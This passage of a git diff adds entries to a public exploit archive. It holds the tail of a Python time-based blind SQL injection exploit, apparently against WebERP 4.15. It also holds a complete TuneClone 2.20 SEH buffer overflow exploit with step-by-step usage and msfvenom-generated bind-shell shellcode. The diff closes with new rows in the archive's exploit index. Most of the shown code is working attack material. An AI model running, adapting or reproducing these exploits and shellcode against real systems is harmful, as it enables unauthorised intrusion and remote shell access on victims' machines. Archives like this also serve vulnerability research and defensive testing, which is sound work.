+        print 'Order means the number of company on the website. Can be gathered from the login page and usually equals 0 or 1'
+        exit()
+    
+    ip = sys.argv[1] + "/" + sys.argv[2]
+    
+    #if don't have php, set Payload to the next one to check this time-based SQLi: YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30=
+    #payload = generatePayload("0 where sleep(1)=1;-- -", "0")
+    
+    payload = generatePayload("0", "' or sleep(5) and '1'='1")
+    
+    #get cookies
+    cookies = getCookies(ip, sys.argv[5], sys.argv[3], sys.argv[4])
+    
+    addSupplierID("GARUMPAGE", cookies, proxies)
+    
+    t1 = time.time()
+    runExploit(cookies, "GARUMPAGE", payload, proxies)
+    t2 = time.time()
+    
+    if (t2-t1>4):
+        print "Blind sqli is confirmed"
+    else:
+        print "Verify input data and try again"
\ No newline at end of file
diff --git a/exploits/windows/local/47012.py b/exploits/windows/local/47012.py
new file mode 100755
index 000000000..64971e626
--- /dev/null
+++ b/exploits/windows/local/47012.py
@@ -0,0 +1,65 @@
+# Exploit Title: TuneClone Local Seh Exploit
+# Date: 19.06.2019
+# Vendor Homepage: http://www.tuneclone.com/
+# Software Link:   http://www.tuneclone.com/tuneclone_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 2.20
+# Tested on: Windows XP SP3 EN
+            
+# 1.- Run python code : TuneClone.py
+# 2.- Open EVIL.txt and copy content to Clipboard
+# 3.- Open TuneClone and press Help and 'Enter License Code'
+# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
+# 5.- Click 'OK' and you will have a bind shell port 3110.
+# 6.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/env python
+
+import struct
+
+buffer = "\x41" * 1056
+nseh = "\xeb\x06\x90\x90" #jmp short 6
+seh  =  struct.pack('<L',0x583411c0) #msaud32.acm
+nops =  "\x90" * 20
+
+#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
+#badchars "\x00\x0a\x0d"
+shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b" 
+"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
+"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
+"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
+"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
+"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
+"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
+"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
+"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
+"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
+"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
+"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
+"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
+"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
+"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
+"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
+"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
+"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
+"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
+"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
+"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
+"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
+"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
+"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
+"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
+"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
+"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
+"\x77\x03\x31\x3a")
+pad ="C" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
+payload = buffer + nseh + seh + nops + shellcode + pad
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(payload)
+	f.write(payload)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index dc2aed23e..1b39f3c3f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6480,6 +6480,7 @@ id,file,description,date,author,type,platform,port
 47002,exploits/multiple/dos/47002.txt,"Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
 47003,exploits/multiple/dos/47003.txt,"Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
 47004,exploits/multiple/dos/47004.txt,"Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
+47015,exploits/linux/dos/47015.c,"Linux - Use-After-Free via race Between modify_ldt() and #BR Exception",2019-06-20,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10556,6 +10557,8 @@ id,file,description,date,author,type,platform,port
 46996,exploits/linux/local/46996.sh,"Exim 4.87 - 4.91 - Local Privilege Escalation",2019-06-17,"Marco Ivaldi",local,linux,
 46998,exploits/windows/local/46998.txt,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)",2019-06-17,Gushmazuko,local,windows,
 47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux,
+47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
+47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17503,6 +17506,7 @@ id,file,description,date,author,type,platform,port
 46974,exploits/linux/remote/46974.txt,"Exim 4.87 < 4.91 - (Local / Remote) Command Execution",2019-06-05,"Qualys Corporation",remote,linux,
 46984,exploits/linux/remote/46984.rb,"Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)",2019-06-11,AkkuS,remote,linux,
 46999,exploits/php/remote/46999.rb,"AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)",2019-06-17,AkkuS,remote,php,
+47016,exploits/linux/remote/47016.rb,"Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)",2019-06-20,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41414,3 +41418,5 @@ id,file,description,date,author,type,platform,port
 47007,exploits/multiple/webapps/47007.txt,"Sahi pro 8.x - Cross-Site Scripting",2019-06-18,"Goutham Madhwaraj",webapps,multiple,
 47010,exploits/aspx/webapps/47010.py,"BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution",2019-06-19,"Aaron Bishop",webapps,aspx,
 47011,exploits/aspx/webapps/47011.py,"BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution",2019-06-19,"Aaron Bishop",webapps,aspx,
+47013,exploits/php/webapps/47013.py,"WebERP 4.15 - SQL injection",2019-06-20,"Semen Alexandrovich Lyhin",webapps,php,
+47014,exploits/aspx/webapps/47014.py,"BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection",2019-06-20,"Aaron Bishop",webapps,aspx,